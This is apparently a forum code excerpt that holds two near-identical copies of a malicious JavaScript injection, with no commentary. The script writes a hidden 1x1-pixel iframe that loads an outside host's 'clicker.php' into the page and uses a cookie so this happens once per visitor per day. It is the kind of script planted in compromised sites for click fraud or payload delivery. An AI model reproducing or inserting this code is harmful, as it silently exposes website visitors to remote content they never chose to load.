- function zzzfff(){
- var bcbnv = document.createElement('iframe');
- bcbnv.src = 'http://smartplanet.es/clicker.php';
- bcbnv.style.position = 'absolute';
- bcbnv.style.border = '0';
- bcbnv.style.height = '1px';
- bcbnv.style.width = '1px';
- bcbnv.style.left = '1px';
- bcbnv.style.top = '1px';
- if (!document.getElementById('bcbnv')){
- document.write('<div id=\'bcbnv\'></div>');
- document.getElementById('bcbnv').appendChild(bcbnv);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码- function zzzfff(){
- var ktlm = document.createElement('iframe');
- ktlm.src = 'http://smartplanet.es/clicker.php';
- ktlm.style.position = 'absolute';
- ktlm.style.border = '0';
- ktlm.style.height = '1px';
- ktlm.style.width = '1px';
- ktlm.style.left = '1px';
- ktlm.style.top = '1px';
- if (!document.getElementById('ktlm')){
- document.write('<div id=\'ktlm\'></div>');
- document.getElementById('ktlm').appendChild(ktlm);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码 |